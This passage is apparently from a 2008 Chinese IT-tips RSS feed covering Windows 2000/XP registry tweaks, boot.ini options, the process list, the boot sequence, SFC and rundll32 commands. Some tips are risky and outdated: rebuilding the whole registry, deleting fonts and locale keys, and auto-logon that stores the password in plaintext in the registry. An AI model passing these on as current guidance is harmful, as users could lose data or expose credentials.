<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs中，存放有关软件共享的dll路径信息，每个dll文件的项值表明它已被几个应用软件共享。如果该项值为0，则说明不被任何软件共享，可以删除，然后再删除对应的dll文件。 </FONT></P>
<P><FONT face=Verdana>    6. 精简注册表（慎用！） </FONT></P>
<P><FONT face=Verdana>    精简注册表的方法是重建注册表： </FONT></P>
<P><FONT face=Verdana>    1）Windows2000下用Regedit导出整个注册表（注意：要确保导出全部注册表而非一个分支），将其存为c:\x.reg。 </FONT></P>
<P><FONT face=Verdana>    2）用DOS 7.0重新启动，载入磁盘高速缓存程序Smartdrv.exe以加快处理速度。 </FONT></P>
<P><FONT face=Verdana>    3）运行DOS版的REGEDIT：C:\Windows\regedit/c x.reg（参数/C表示从后面指定文件中重新生成整个注册表），重建的注册表文件比减小25-30%左右，达到精简目的。 </FONT></P>
<P><FONT face=Verdana>    7. 等待时间优化 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control中： </FONT></P>
<P><FONT face=Verdana>    WaitToKillServiceTimeout设为：1000或更小。 </FONT></P>
<P><FONT face=Verdana>    HKEY_CURRENT_USER\Control Panel\Desktop和HKEY_USERS\Control Panel\Desktop中： </FONT></P>
<P><FONT face=Verdana>    （1）WaitToKillAppTimeout改为1000，即关闭程序时仅等待1秒； </FONT></P>
<P><FONT face=Verdana>    （2）HungAppTimeout值改为：200，表示程序出错时等待0.5秒； </FONT></P>
<P><FONT face=Verdana>    3）AutoEndTasks值改为1，表示自动关闭停止相应的程序。 </FONT></P>
<P><FONT face=Verdana>    8. 快速定位鼠标 </FONT></P>
<P><FONT face=Verdana>    Windows 2000允许用户对鼠标的采样速率进行设定，使鼠标能更精确地移动和定位。 </FONT></P>
<P><FONT face=Verdana>    鼠标的采样速率设置为100Hz，输入缓冲区长度设置为300Hz。如果在设置后系统变得不稳定，改变采样速率，设置成80Hz或以下即可。 </FONT></P>
<P><FONT face=Verdana>    9. 快速显示菜单 </FONT></P>
<P><FONT face=Verdana>    Windows 2000的默认菜单显示是“淡入淡出”的效果，这种效果下，修改菜单的显示速度并不明显。 </FONT></P>
<P><FONT face=Verdana>    将“动画显示菜单和工具提示”效果”改为“滚动效果”。 </FONT></P>
<P><FONT face=Verdana>    HKEY_CURRENT_USER\ControlPanel\Desktop中MenuShowDelay项，这一项的取值范围是0～100000（单位为毫秒），将默认的值改为0或者是400。 </FONT></P>
<P><FONT face=Verdana>    10. 删除多余的键盘布局、输入法和区域设置 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts中，对应“控制面板”中的“键盘布局/输入法”，可直接删除未用语言的键盘布局和未用的输入法子项； </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale中，是“区域设置”，保留值不为空的项值，其它的全部删除。 </FONT></P>
<P><FONT face=Verdana>    11. 删除系统不用的字体和HELP文档（慎用！） </FONT></P>
<P><FONT face=Verdana>    把\WINNT\Fonts整个目录打包压缩成一个文件保存。删除所有不用的字体，只保留Arial、Marlett、Micosoft Scans Serif Regular 、MingLiU & PmingLiU、Modern、MS Outlook、MS Serif 8,10,12、Script、SimSun & NsimSun、Tahoma、Times New Roman、宋体、仿宋、楷体、黑体几个字体。需要其它字体时解压对应的字体到Fonts目录中。 </FONT></P>
<P><FONT face=Verdana>    12. 在“运行”中添加“在单独的内存空间中运行”的选项 </FONT></P>
<P><FONT face=Verdana>    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer中，新建DWORD型MemCheckBoxInRunDlg，值设为1。 </FONT></P>
<P><FONT face=Verdana>    注：默认情况下，所有16位程序都在单一共享的 VDM （虚拟DOS机器）进程中作为线程运行。这种情况下，这些程序共享分配给 VDM 进程的内存空间，因此不能同时运行。所作设置就是允许用户在专用的(不是共享的)VDM进程中运行16位程序。复选框只在用户在输入16位程序时才被启用。 </FONT></P>
<P><FONT face=Verdana>    启动优化： </FONT></P>
<P><FONT face=Verdana>    1.取消系统检测串口 </FONT></P>
<P><FONT face=Verdana>    打开 Boot.ini 文件，如下修改： </FONT></P>
<P><FONT face=Verdana>    [operating systems] </FONT></P>
<P><FONT face=Verdana>    multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows 2000 Professional" /fastdetect/NoSerialMice </FONT></P>
<P><FONT face=Verdana>    启动时不检测行串口，缩短启动时间。 </FONT></P>
<P><FONT face=Verdana>    2. 快速启动 </FONT></P>
<P><FONT face=Verdana>    multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /fastdetect </FONT></P>
<P><FONT face=Verdana>    改为：multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /nodetect </FONT></P>
<P><FONT face=Verdana>    HKey_Local_Machine\System\ControlSet001\Control中，SystemStartOptions键值改为nodetect </FONT></P>
<P><FONT face=Verdana>    3.关闭无用服务 </FONT></P>
<P><FONT face=Verdana>    运行→Services.msc→Windows2000服务的详细列表。 </FONT></P>
<P><FONT face=Verdana>    Windows 2000服务设置 </FONT></P>
<P><FONT face=Verdana>    4. 加快启动和减少故障恢复时间 </FONT></P>
<P><FONT face=Verdana>    减少Windows2000系统启动时显示操作系统列表的时间。如果不是网络系统管理员，可以去掉“将事件写入系统日志”和“发出管理警报”两个选项，并将“写入调试信息”设置为“无”。 </FONT></P>
<P><FONT face=Verdana>    5. 删掉不需要的组件 </FONT></P>
<P><FONT face=Verdana>    （1）去除文件夹选项的文件隐藏、只读等属性； </FONT></P>
<P><FONT face=Verdana>    （2）\WINNT\inf文件夹，用记事本打开sysoc.ini文件，替换“,hide”为空，保存退出。控制面板→添加/删除程序→添加/删除Windows组件，根据需要修改。 </FONT></P>
<P><FONT face=Verdana>    6. 屏蔽CD自动播放 </FONT></P>
<P><FONT face=Verdana>    启动时，打开CD自动播放功能会延缓启动速度。运行→gpedit.msc→管理模板，设置是否自动播放CD。 </FONT></P>
<P><FONT face=Verdana>    7. 快速登录计算机系统 </FONT></P>
<P><FONT face=Verdana>    系统属性→网络ID→网络标识→根据“网络标识向导”操作。 </FONT></P>
<P><FONT face=Verdana>    设置时注意：选择“本机用于家庭，不是商业网络的一部分”，以及“Windows始终假设下列用户已登录到本机上”。 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\Software\Microsoft\WinNT\CurrentVersion\Winlogon中， </FONT></P>
<P><FONT face=Verdana>    （1）AutoAdminLogon值改为“1” </FONT></P>
<P><FONT face=Verdana>    （2）DefaultDomainName值改为所要登录的域名或本机计算机名 </FONT></P>
<P><FONT face=Verdana>    （3）DefaultUserName值改为自动登录的用户名 </FONT></P>
<P><FONT face=Verdana>    （4）DefaultPassword值改为密码。（注意：这几个都是字符串值。） </FONT></P>
<P><FONT face=Verdana>    如果想临时取消自动登录或者需要以其他用户名登录，在启动时按住Shift键。 </FONT></P>
<P><FONT face=Verdana>    8. 加快Explorer启动速度 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace中： </FONT></P>
<P><FONT face=Verdana>    删除{D6277990-4C6A-11CF-8D87-00AA0060F5BF} (计划任务) </FONT></P>
<P><FONT face=Verdana>    9. Windows 2000启动盘制作： </FONT></P>
<P><FONT face=Verdana>    （1）Windows 2000 启动盘：d:\bootdisk\makeboot a: </FONT></P>
<P><FONT face=Verdana>    （2）Windows 2000 引导盘：ntldr，ntdlect.com，boot.ini，IO.sys </FONT></P>
<P><FONT face=Verdana>    （3）Windows 2000 紧急修复磁盘（ERD）：ntbackup.exe<BR></FONT></P>]]></description>
</item>

<item>
<title><![CDATA[WIN2000使用纯DOS的方法]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2561</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:22:12</pubDate>
<description><![CDATA[<P><FONT face=Verdana>在Windows 2000使用纯DOS的方法</FONT></P>
<P><FONT face=Verdana>有一种非常巧妙的方法可以让Windows 2000安装后也能够进入纯DOS：在安装Windows 2000前先用Windows 98启动盘启动，并通过SYS C：命令向C盘传输系统，然后按常规方法安装Windows 2000，安装成功后即可在启动菜单中在默认的Microsoft Windows 2000菜单下会多出一个Microsoft Windows项目，选中此选项就会启动Windows，但由于我们并没有安装Windows 98，所以此时会出现我们需要的DOS窗口，而且绝对是正宗的实模式。</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[WIN2000进程]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2560</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:21:46</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Windows 2000/XP 的任务管理器是一个非常有用的工具，它能提供我们很多信息，比如现在系统中运行的程序（进程），但是面对那些文件可执行文件名我 们可能有点茫然，不知道它们是做什么的，会不会有可疑进程（病毒，木马等）。本文的目的就是提供一些常用的Windows 2000 中的进程名，并简单说明它们的用处。 </FONT></P>
<P><FONT face=Verdana>在Windows 2000 中,系统包含以下缺省进程： <BR>Csrss.exe <BR>Explorer.exe <BR>Internat.exe <BR>Lsass.exe <BR>Mstask.exe <BR>Smss.exe <BR>Spoolsv.exe <BR>Svchost.exe <BR>Services.exe <BR>System <BR>System Idle Process <BR>Taskmgr.exe <BR>Winlogon.exe <BR>Winmgmt.exe </FONT></P>
<P><FONT face=Verdana>下面列出更多的进程和它们的简要说明 </FONT></P>
<P><FONT face=Verdana>进程名描述 </FONT></P>
<P><FONT face=Verdana>smss.exeSessionManager <BR>csrss.exe 子系统服务器进程 <BR>winlogon.exe管理用户登录 <BR>services.exe包含很多系统服务 <BR>lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。 <BR>svchost.exe Windows 2000/XP 的文件保护系统 <BR>SPOOLSV.EXE 将文件加载到内存中以便迟后打印。) <BR>explorer.exe资源管理器 <BR>internat.exe托盘区的拼音图标) <BR>mstask.exe允许程序在指定时间运行。 <BR>regsvc.exe允许远程注册表操作。(系统服务)->remoteregister <BR>winmgmt.exe 提供系统管理信息(系统服务)。 <BR>inetinfo.exemsftpsvc,w3svc,iisadmn <BR>tlntsvr.exe tlnrsvr <BR>tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。 <BR>termsrv.exe termservice <BR>dns.exe 应答对域名系统(DNS)名称的查询和更新请求。 <BR>tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。 <BR>ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。 <BR>ups.exe 管理连接到计算机的不间断电源(UPS)。 <BR>wins.exe为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。 <BR>llssrv.exe证书记录服务 <BR>ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。 <BR>RsSub.exe 控制用来远程储存数据的媒体。 <BR>locator.exe 管理 RPC 名称服务数据库。 <BR>lserver.exe 注册客户端许可证。 <BR>dfssvc.exe管理分布于局域网或广域网的逻辑卷。 <BR>clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。 <BR>msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统或其它事务保护护资源管理器。 <BR>faxsvc.exe帮助您发送和接收传真。 <BR>cisvc.exe 索引服务 <BR>dmadmin.exe 磁盘管理请求的系统管理服务。 <BR>mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。 <BR>netdde.exe提供动态数据交换 (DDE) 的网络传输和安全特性。 <BR>smlogsvc.exe配置性能日志和警报。 <BR>rsvp.exe为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功功能。 <BR>RsEng.exe 协调用来储存不常用数据的服务和管理工具。 <BR>RsFsa.exe 管理远程储存的文件的操作。 <BR>grovel.exe扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间（只对 NTFS 文件系统有用）。 <BR>SCardSvr.ex 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。 <BR>snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。 <BR>snmptrap.exe接收由本地或远程 SNMP 代理程序产生的陷阱（trap）消息，然后将消息传递到运行在这台计算机上 SNMP 管理程序。 <BR>UtilMan.exe 从一个窗口中启动和配置辅助工具。 <BR>msiexec.exe依据 .MSI 文件中包含的命令来安装、修复以及删除软件。 </FONT></P>
<P><FONT face=Verdana>总结： 发现可疑进程的秘诀就是要多看任务管理器中的进程列表，看多了以后，一眼就可以发现可可疑进程，就象找一群熟悉人中的陌生人一样。 <BR></FONT></P>]]></description>
</item>

<item>
<title><![CDATA[WIN2000XP启动详解]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2559</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:21:21</pubDate>
<description><![CDATA[<FONT face=Verdana>Windows2000/XP启动过程详解<BR> <BR>   <BR>Windows2000/XP是一个优秀的操作系统,它功能强大,安全稳定,深受广大电脑用户青睐。但在使用过程中,我们明显地感觉到它的启动时间比Windows98要延长许多,比之Windows98更能考验人的耐性。那么在这段让人忍无可忍但又不可不忍的时间中,系统究竟做了些什么工作哪,别急，，容俺慢慢道来，咱看一看它究竟为何如此龟速。<BR>     在基于INTEL的计算机上,Windows2000/XP的启动过程大致可分为5个步骤:预启动,启动,装载内核,初始化内核以及用户登录。下面分别展开介绍：<BR>     一.预启动<BR>     首先计算机通电进行自检,并由BIOS(即基本输入输出系统)完成基本硬件配置,然后读取硬盘的MBR(主引导记录)检查硬盘分区表以确定引导分区,并将引导分区上的操作系统引导扇区调入内存中执行,此处即执行NTLDR(操作系统加载器)文件。<BR>          * Windows2000/XP支持多重启动。它在安装时会首先将已存在的其它操作系统引导扇区保存为BOOTSECT.DOS文件(位于活动分区根目录下),并修改系统引导扇区,以便系统启动时加载NTLDR文件,从而达到多重启动的目的。而Windows98则不具备这个功能，因此如果先装好Windows2000/XP后再装Windows98会破坏掉Windows2000/XP的引导记录，导致2000/XP不能启动。<BR>     二.启动<BR>          1.首先进行出始化,NTLDR会把处理器从实模式转换为32位保护模式。<BR>          2.读取BOOT.INI文件。该文件位于活动分区根目录下,它的作用是使系统在启动过程中出现选择菜单,由用户选择希望启动的操作系统。如果选择启动Windows2000/XP,NTLDR会继续引导进行以下过程;如果选择为非Windows2000/XP系统,NTLDR则会读取系统引导扇区副本BOTSECT.DOS转入启动相应系统。<BR>          * 其中[BOOT LOADER]即操作系统加载器,指定系统选择菜单默认等待时间和默认引导的操作系统。可手工修改或在控制面板中修改，为了保险起见，建议在控制面板中修改。依次选择控制面板-〉系统-〉高级->启动和故障恢复，即可更改相关设置。(在WindowsXP中还有另一种方法，即运行msconfig（系统配置实用程序）。<BR>            [OPERATING SYSTEMS]段指定操作系统列表,由双引号括起来的部分就是列表所显示的内容,可任意修改,使其更加个性化。<BR>          * 形如MULTI(0)DISK(0)RDISK(0)PARTITION(1)格式的语句被称为ARC路径,它的格式为:MULTI()——指定磁盘控制器(若为SCSI控制器,则此处应替换为SCSI())；DISK()——指定SCSI设备编号(对于MULTI该处值始终为0)；RDISK()——指定IDE设备编号(对于SCSI,此处被忽略)；PARTITION()——指定分区编号。除分区编号由1开始外,其余编号均从0开始。<BR>            参数/FASTDETECT表示禁用串行鼠标检测,是系统默认值。还有几个常见参数:MAXMEM——指定Windows2000/XP可用内存容量;BASEVIDEO——使用标准VGA显示驱动程序;NOGUIBOOT——启动过程中不显示图形屏幕;SOS——加载设备驱动程序时显示其名称。<BR>          * 在操作系统选择菜单中的中文字体由位于活动分区根目录下的BOOTFONT.BIN文件提供。<BR>          3.系统加载NTDETECT.COM文件。由它来检测机器硬件,如并行端口,显示适配器等等,并将收集到的硬件列表返回NTLDR用于以后在注册表中注册保存。<BR>          4.如果Windows2000/XP有多个硬件配置文件,此时会出现选择菜单,等待用户确定要使用的硬件配置文件,否则直接跳过此步,启用默认配置。<BR>          * 硬件配置文件是指保存计算机特定硬件配置的系统文件。可以创建多个不同的硬件配置文件以满足计算机在不同场合的应用。可以依次选择控制面板-〉系统->硬件-〉硬件配置文件作出修改。<BR>     三.装载内核<BR>          引导过程开始装载Windows2000/XP内核NTOSKRNL.EXE。这个文件位于Windows2000/XP安装文件夹下的SYSTEM32文件夹中。随后,硬件抽象层(HAL)被引导进程加载,完成本步骤。<BR>          * 硬件抽象层(HAL):隐藏特定平台的硬件接口细节,为操作系统提供虚拟硬件平台,使其具有硬件无关性,可在多种平台上进行移植。<BR>     四.初始化内核<BR>          内核完成初始化,NTLDR将控制权转交Windows2000/XP内核,后者开始装载并初始化设备驱动程序,以及启动WIN32子系统和WINDOWS2000/XP服务。<BR>     五.用户登录<BR>          开始登录进程。由WIN32子系统启动WINLOGON.EXE,并由它启动LOCAL SECURITY AUTHORITY(LSASS.EXE)显示登录对话框。用户登录后,WINDOWS2000/XP会继续配置网络设备和用户环境。最后,伴随着微软之声和我们熟悉的个性化桌面,WINDOWS2000/XP漫长的启动过程终于完成。呵，是不是睡着了，醒醒吧，系统启动成功，您现在该干嘛就干嘛！ </FONT>]]></description>
</item>

<item>
<title><![CDATA[SFC使用方法]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2558</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:21:00</pubDate>
<description><![CDATA[<P><FONT face=Verdana>SFC使用方法   </FONT></P>
<P><FONT face=Verdana>　　SFC(System Files Checker，系统文件检查器)。以管理员身份登录Windows XP，将Windows XP的安装光盘放入光驱，在“命令提示符”窗口中键入“SFC/SCANNOW”命令后回车，“系统文件检查器”开始自动扫描系统文件，而且不需要你的任何干预。不过需要提醒大家的是，尽管Windows 2000/XP下的“SFC”比Windows 98下的“SFC”聪明得多，但要想正常运行它，还得注意以下两个问题：</FONT></P>
<P><FONT face=Verdana>　　1.在运行“SFC”之前必须将Windows XP安装光盘放入光驱，否则在扫描过程中会提示你插入安装光盘。即使你插入了安装光盘，系统仍会有出错提示。<BR>　　2.在Windows 2000/XP下使用“系统文件检查器”时，必须加上正确的参数才能正常运行。我们可以在“命令提示符”窗口中键入“SFC”命令查看这些参数。<BR>　　3.由于Windows 2000/XP下的“SFC”命令是完全自动执行的，因此我们无法直接知道修复了哪些系统文件。不过我们可以通过以下方法间接获得系统文件的修复情况：依次打开“控制面板→管理工具→事件查看器→系统”，根据时间提示，从列表中选定运行“SFC”时的事件，右击该事件并查看其属性即可。</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[RUNDLL32内容]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2557</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:20:33</pubDate>
<description><![CDATA[<P><FONT face=Verdana>RUNDLL32.EXE 是什么程序 </FONT></P>
<P><FONT face=Verdana>    Rundll32.exe是什么？顾名思意，“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数，这样在进程当中，只会有Rundll32.exe，而不会有DLL后门的进程，这样，就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe，不必惊慌，这证明用Rundll32.exe启动了多少个的DLL文件。当然，这些Rundll32.exe执行的DLL文件是什么，我们都可以从系统自动加载的地方找到。</FONT></P>
<P><FONT face=Verdana>    现在，我来介绍一下Rundll32.exe这个文件，意思上边已经说过，功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件，他的意思是“执行16位的DLL文件”，这里要注意一下。在来看看Rundll32.exe使用的函数原型：<BR>    Void CALLBACK FunctionName (<BR>    HWND hwnd,<BR>    HINSTANCE hinst,<BR>    LPTSTR lpCmdLine,<BR>    Int nCmdShow<BR>    );</FONT></P>
<P><FONT face=Verdana>    其命令行下的使用方法为：Rundll32.exe DLLname,Functionname [Arguments]<BR>    DLLname为需要执行的DLL文件名；Functionname为前边需要执行的DLL文件的具体引出函数；[Arguments]为引出函数的具体参数。<BR>略谈Rundll32.exe的作用  (我是菜鸟)     </FONT></P>
<P><FONT face=Verdana>    </FONT></P>
<P><FONT face=Verdana>    常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正知道如何使用它们的朋友想必不多。那么好，如果你还不清楚的话，那么就让我来告诉你吧。 <BR>    首先，请你做个小实验（请事先保存好你正在执行的程式的结果，否则...）：点击“开始－程式－Ms－Dos方式”，进入Dos视窗，然後键入rundll32.exe user.exe,restartwindows，再按下回车键，这时你将看到，机器被重启了！怎么样，是不是很有趣？ <BR>     当然，Rundll的功能绝不仅仅是重启你的机器。其实，Rundll者，顾名思义，执行Dll也，它的功能就是以命令列的方式呼叫Windows的动态链结库，Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库，而後者是运用於16位的链结库，它们的命令格式是： </FONT></P>
<P><FONT face=Verdana>     RUNDLL.EXE ，， <BR>     这里要注意三点：1.Dll档案名中不能含有空格，比如该档案位於c:\ProgramFiles\目录，你要把这个路径改成c:\Progra～1\；2.Dll档案名与Dll入口点间的逗号不能少，否则程式将出错并且不会给出任何资讯！3.这是最重要的一点：Rundll不能用来呼叫含返回值参数的Dll，例如Win32API中的GetUserName(),GetTextFace()等。在Visual Basic中，提供了一条执行外部程式的指令Shell,格式为： <BR>     Shell “命令列” <BR>     如果能配合Rundll32.exe用好Shell指令，会使您的VB程式拥有用其他方法难以甚至无法实现的效果：仍以重启为例，传统的方法需要你在VB工程中先建立一个模组，然後写入WinAPI的声明，最後才能在程式中呼叫。而现在只需一句: </FONT></P>
<P><FONT face=Verdana>     Shell “rundll32.exe user.exe,restartwindows”就搞定了！是不是方便多了？ <BR>     实际上，Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特的优势。下面，我就将本人在因特网上收集的有关Rundll的指令列举如下（很有用的，能省去你很多呼叫Windows  API的时间！！），供大家在程式设计中引用： <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL <BR>     功能: 显示控制面板 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1 <BR>     功能: 显示“控制面板－辅助选项－键盘”选项视窗 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2 <BR>     功能: 显示“控制面板－辅助选项－声音”选项视窗 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3 <BR>     功能: 显示“控制面板－辅助选项－显示”选项视窗 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4 <BR>     功能: 显示“控制面板－辅助选项－滑鼠”选项视窗 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5 <BR>     功能: 显示“控制面板－辅助选项－传统”选项视窗 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1 <BR>     功能: 执行“控制面板－添加新硬体”向导。 <BR>     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter <BR>     功能: 执行“控制面板－添加新印表机”向导。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1 <BR>     功能: 显示 “控制面板－添加/删除程式－安装/卸载” 面板。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2 <BR>     功能: 显示 “控制面板－添加/删除程式－安装Windows” 面板。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3 <BR>     功能: 显示 “控制面板－添加/删除程式－启动盘” 面板。 <BR>     命令列: rundll32.exe syncui.dll,Briefcase_Create <BR>     功能: 在桌面上建立一个新的“我的公文包”。 <BR>     命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll <BR>     功能: 显示复制软碟视窗 <BR>     命令列: rundll32.exe apwiz.cpl,NewLinkHere ％1 <BR>     功能: 显示“建立快捷方式”的对话框，所建立的快捷方式的位置由％1参数决定。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0 <BR>     功能: 显示“日期与时间”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1 <BR>     功能: 显示“时区”选项视窗。 <BR>     命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称] <BR>     功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接，则显示目前的连接状态的视窗。 <BR>     命令列: rundll32.exe rnaui.dll,RnaWizard <BR>     功能: 显示“新建拨号连接”向导的视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0 <BR>     功能: 显示“显示属性－背景”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1 <BR>     功能: 显示“显示属性－萤屏保护”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2 <BR>     功能: 显示“显示属性－外观”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3 <BR>     功能: 显示显示“显示属性－属性”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder <BR>     功能: 显示Windows的“字体”档案夹。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 <BR>     功能: 同样是显示Windows的“字体”档案夹。 <BR>     命令列: rundll32.exe shell32.dll,SHformatDrive <BR>     功能: 显示格式化软碟对话框。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0 <BR>     功能: 显示“控制面板－游戏控制器－一般”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1 <BR>     功能: 显示“控制面板－游戏控制器－进阶”选项视窗。 <BR>     命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档) <BR>     功能: 列印HTML文档。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl <BR>     功能: 显示Microsoft Exchange一般选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0 <BR>     功能: 显示“控制面板－滑鼠” 选项 。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 <BR>     功能: 显示 “控制面板－键盘属性－速度”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1 <BR>     功能: 显示 “控制面板－键盘属性－语言”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2 <BR>     功能: 显示Windows“印表机”档案夹。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 <BR>     功能: 显示Windows“字体”档案夹。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4 <BR>     功能: 显示“控制面板－输入法属性－输入法”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add <BR>     功能: 执行“添加新调制解调器”向导。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0 <BR>     功能: 显示“控制面板－多媒体属性－音频”属性页。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1 <BR>     功能: 显示“控制面板－多媒体属性－视频”属性页。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2 <BR>     功能: 显示“控制面板－多媒体属性－MIDI”属性页。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3 <BR>     功能: 显示“控制面板－多媒体属性－CD音乐”属性页。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4 <BR>     功能: 显示“控制面板－多媒体属性－设备”属性页。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1 <BR>     功能: 显示“控制面板－声音”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl <BR>     功能: 显示“控制面板－网路”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl <BR>     功能: 显示ODBC32资料管理选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,OpenAs_RunDLL {drive:\path\filename} </FONT></P>
<P><FONT face=Verdana>     功能: 显示指定档案(drive:\path\filename)的“打开方式”对话框。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl <BR>     功能: 显示“控制面板－密码”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl <BR>     功能: 显示“控制面板－电源管理属性”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL  PrintersFolder <BR>     功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL  main.cpl @2) <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0 <BR>     功能: 显示“控制面板－区域设置属性－区域设置”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1 <BR>     功能: 显示“控制面板－区域设置属性－数字”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2 <BR>     功能: 显示“控制面板－区域设置属性－货币”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3 <BR>     功能: 显示“控制面板－区域设置属性－时间”选项视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4 <BR>     功能: 显示“控制面板－区域设置属性－日期”选项视窗。 <BR>     命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名] <BR>     功能: 